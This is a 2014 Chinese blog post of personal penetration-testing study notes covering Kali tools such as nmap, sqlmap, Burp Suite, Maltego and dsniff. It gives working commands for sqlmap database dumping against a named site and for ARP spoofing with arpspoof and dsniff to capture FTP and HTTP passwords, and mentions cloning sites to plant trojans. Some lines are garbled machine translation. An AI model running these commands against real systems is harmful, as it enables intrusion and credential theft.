zcc1414

博客园 首页 联系 订阅 管理

下面是我学习渗透时的工具学习:

1 httrack  可以拷贝网站  做挂马 等工具使用

kali 上 安装它,然后创建目录  myweb  登陆上去  httack 输入网站名 可以定制抓什么文件,然后就拷贝成功了

2 nmap 很强大  

#nmap 192.168.1.1/24 扫描整个子网段

扫描多个目标,命令如下:
#nmap 192.168.1.2 192.168.1.5

扫描一个范围内的目标,如下:
#nmap 192.168.1.1-100 //(扫描IP地址为192.168.1.1-192.168.1.100内的所有主机)

#nmap -sS 192.168.1.1 //如果Nmap命令中没有指出扫描类型,默认的就是Tcp SYN.但是它需要root/administrator权限.

#nmap -sT 192.168.1.1 //如果不选择SYN扫描,TCP connect()扫描就是默认的扫描模式.不同于Tcp SYN扫描,Tcp connect()扫描需要完成三次握手,并且要求调用系统的connect().Tcp connect()扫描技术只适用于找出TCP和UDP端口.

nmap -sF 192.168.1.8  //FIN扫描也不会在目标主机上创建日志(FIN扫描的优势之一).个类型的扫描都是具有差异性的,FIN扫描发送的包只包含FIN标识,NULL扫描不发送数据包上的任何字节,XMAS扫描发送FIN、PSH和URG标识的数据包.

# nmap -O -PN 192.168.1.1/24 //如果远程主机有防火墙,IDS和IPS系统,你可以使用-PN命令来确保不ping远程主机,因为有时候防火墙会组织掉ping请求.-PN命令告诉Nmap不用ping远程主机。
# nmap -O --osscan-guess 192.168.1.1 //想好通过Nmap准确的检测到远程操作系统是比较困难的,需要使用到Nmap的猜测功能选项, –osscan-guess 猜测认为最接近目标的匹配操作系统类型。

Nmap's操作系统的检测是很准确也是很有效的,举例:使用系统Solaris 2.7带有SYN扫描的指纹验证堆栈。 
# nmap -sS -O 192.168.7.12 


-v: Increase verbosity level (use -vv or more for greater effect)

nmap -P 80,443,8080 -P0 -sV x.x.x.0/24 -T5  这个是扫描整个网段内的 服务


OUTPUT:
  -oN/-oX/-oS/-oG <file>: Output scan in normal, XML, s|<rIpt kIddi3

HOST DISCOVERY:

  -n/-R: Never do DNS resolution/Always resolve [default: sometimes] 不做DNS解析/总是做

nmap -n -oX my.xml 182.18.152.0/24

db_import my.xml

hosts


[*] Nmap: -A: Enable OS detection, version detection, script scanning, and traceroute

msf 中 db_nmap  -n -A xxx.com

db_nmap -n -A 182.18.152.8


3  dig  ip    //Dig (domain information groper) is one the most popular and widely used DNS

DIG(域信息搜索器)是一种最流行和广泛使用的DNS
侦察工具。它会查询DNS服务器。  dig -t    选项将委派DNS区域使用授权名称

root@bt:/opt/metasploit/msf3# dig -t ns www.baidu.com

;; QUESTION SECTION:
;www.baidu.com.			IN	NS

;; ANSWER SECTION:
www.baidu.com.		5	IN	CNAME	www.a.shifen.com.

;; AUTHORITY SECTION:
a.shifen.com.		5	IN	SOA	ns1.a.shifen.com. baidu_dns_master.baidu.com. 1409040001 5 5 86400 3600
baidu_dns_master.baidu.com  DNS服务器域名

4 Maltego
讲信息收集就不得不说Maltego。Maltego应用于收集包括:域名、DNS名whios信息、ip地址等网络数据及通过公司或组织名称、邮件地址、网站、社区网络(facebook等)、电话号码收集关于个人的信息。可谓是社工利器。

注册页面 : http://www.paterva.com/redirect/m3ceregister.html



5   Arping

由于防火墙的使用等原因,部分主机会出现ping不通的状况。Arping通过发送Arp request的方式进行测试(直连网络),确定一个特定的ip在线。
直接在终端中输入命令使用。
基本命令格式:arping -c 3 192.168.1.1
参数解释:-c 3  发送的Arp请求包的数量
192.168.1.1  目标地址
如果主机在线,则返回相应的包,反之则提示丢包。

6  Genlist
genlist可以快速的扫描ip段内的存活主机,而且结果呈列表式,因此与fping相比,更简洁明了。
通过直接在终端内运行命令使用。
基本命令:genlist -s 192.168.1.*
参数解释:-s 192.168.1.*    目标ip段

7  Nbtscan

nbtscan是一个扫描网段内微软主机netbios信息的工具,只适用于局域网,可以显示ip,主机名,用户名及mac地址等。速度较快。

通过直接在终端内运行命令使用。

基本命令:nbtscan 192.168.1.1-255

8 Zenmap 

IPv4/IPv6网络安全测试工具—Evil Foca (Alpha版)

下载地址: http://www.freebuf.com/tools/8397.html

安装不成功   提示不行~_~ 不知道为什么


10 Webshag
Webshag是一个多线程,用于审核Web服务器的多平台工具。

来到选项卡:spider·  输入目标网址 之后点击 确定会得到一些与这个  域名相关的邮箱帐号  和  网站内部路径  和  这个域名相关的外部链接

11 Skipfsh

Skipfsh是一个Web应用程序安全侦测工具。Skipfsh的准备
互动地图使用递归抓取和基于字典的探头目标。
生成的地图被扫描的安全检查后,提供输出。

下载  https://code.google.com/p/skipfish/

make all 编译  所有  得到软件

请注意,当使用默认skipfish字典将不运行
-S 命令。您可以复制一个默认的词库

-o 输出命令

最后可以从html中 查看  扫描到的东西

./skipfish -o log -S /pentest/web/skipfish/dictionaries/complete.wl   http://sebug.net


12 Which

可以查询 软件安装目录  可以去找到 软件目录了

which指令会在PATH变量指定的路径中,搜索某个系统命令的位置,并且返回第一个搜索结果

cd 这个常用的命令竟然找不到啊!为什么呢?这是因为 cd 是bash 内建的命令! 但是 which 默认是找 PATH 内所规范的目录


13 Websploit is an open source project used to scan and analyze remote systems to find vulnerabilities.

show modules

show options

use xxxx

set xxxxx

run

14

14 

w3af(简称Web应用程序攻击和审计框架)是一个开放源代码的

Web应用程序安全扫描仪和开发工具。W3af可以根据访问

Web应用程序评估|网络漏洞扫描器通过选择w3af。


15 sqlmap

一个常见的​​功能块。关键字会有的SqlMap得到数据库。
的SqlMap -u http://www.drchaous.com/article.php?id=5 --dbs //扫出test 数据库

sqlmap –u http://www.drchaos.com/article.php?id=5 -D test--tables

sqlmap -u http://www.drchaous.com/article.php?id=5 -T xxxtablesnameherexxx --columns

sqlmap -u http://www.drchaous.com/article.php?id=5 -T xxx tablesnameherexxx -U

sqlmap -u http://www.drchaous.com/article.php?id=5 -T xxxtablesnameherexxx -U xxxtestxxx --dump


16 linux  find  + locate命令学习

find / -name "dsniff"  可以查到 它的目录,但不能查到 dsniff.service

locate xxx 可以直接查到  文件名称相关的文件


17 burpsuit 

xp 下是pro版本,kali 是限制版本的

1) spider 可以扫描目录 针对 * 文件扫

2)scanner  漏洞扫描,可以由spider 中 选择active scan 主动扫描进行,设置30个线程去扫 很强大

3) intruder  字典破解~_~ clear  $ 然后 add $  然后选择字典  注意 有很多自定义字典  还能够修改传输包

4) repeater  手工检测等

5) decoder 编码工具  很有用啊~_~  

6)  comparer 比较工具   两次的截取抓包  发送到comparer 就可以比较了


18  dsniff 工具学习

先用 nmap 扫一下内网有哪些主机 nmap -sS x.x.x.1-255

扫描针对某IP进行攻击

其一,首先打开本机的路由转发功能
操作:echo "1" > /proc/sys/net/ipv4/ip_forward
第二:
#arpspoof -t 网关的IP 受攻击者的IP
第三:打开另一个终端执行
#dsniff -c -f /usr/loca/lib/dsniff.service
到现在这个份上基本上它已经可以工作了
你可以在本机上试验一下

扫描百度账号 只能错误的才截取到,正确的不可以截取,看来百度还做的不错啊~_~

另外一种设置:

使用 A 嗅探 B 的FTP、http登录密码
1. 使用 arpspoof 对目标机实施ARP欺骗攻击
# arpspoof -i eth0 -t 192.168.0.125 192.168.0.1
2. 使用 dsniff 取得指定端口的数据信息
# dsniff -i eth0 -t 21/tcp=ftp,80/tcp=http
Dsniff支持的协议类型包括:
FTP,Telnet,SMTP,HTTP,POP,NNTP,IMAP,SNMP,LDAP,Rlogin,RIP,OSP
F,PPTP,MS-CHAP,NFS,VRRP,YP/NIS,SOCKS,X11,CVS,IRC,AIM,ICQ,Napster,ostgreSQL,Meeting Maker,Citrix ICA,Symantec,pcAnywhere,NA
I Sniffer,Microsoft SMB,Oracle QL*Net,Sybase及Microsoft SQL认证信息

FTP等的可以扫    ,phpmyadmin

 

更深入了解: http://viewer.ubnt.com.cn/web/viewer.php?aid=NDY4OHw1Yjg0N2I2MHwxNDEwNzg2NzY5fDB8NTY2OQ%3D%3D

纯粹被动地进行网络活动监视的工具,包括:dsniff、filesnarf、mailsnarf 、msgsnarf、urlsnarf、webspy


19  Firefox插件

1)  Fiddler web debugger 工具  

Fiddler是最强大最好用的Web调试工具之一,它能记录所有客户端和服务器的http和https请求,允许你监视,设置断点,甚至修改输入输出数据. 使用Fiddler无论对开发还是测试来说,都有很大的帮助。

学习文章 : Fiddler 教程

bpu http://xxx.com   和 bpafter http://xxx.com

Fiddler 浏览器代理神器,拦截请求或响应抓包,重放,模拟请求,编码解码,三方扩展Watcher-Web前端安全的自动审计工具

2) Firebug-抓包与各种调试


3) amper Data-拦截修改


4) Live Http Header-重放功能


5)Hackbar-编码解码/POST提交


6) Modify Headers-修改头部







posted on 2014-09-09 17:54  zcc1414  阅读(929)  评论(0编辑  收藏  举报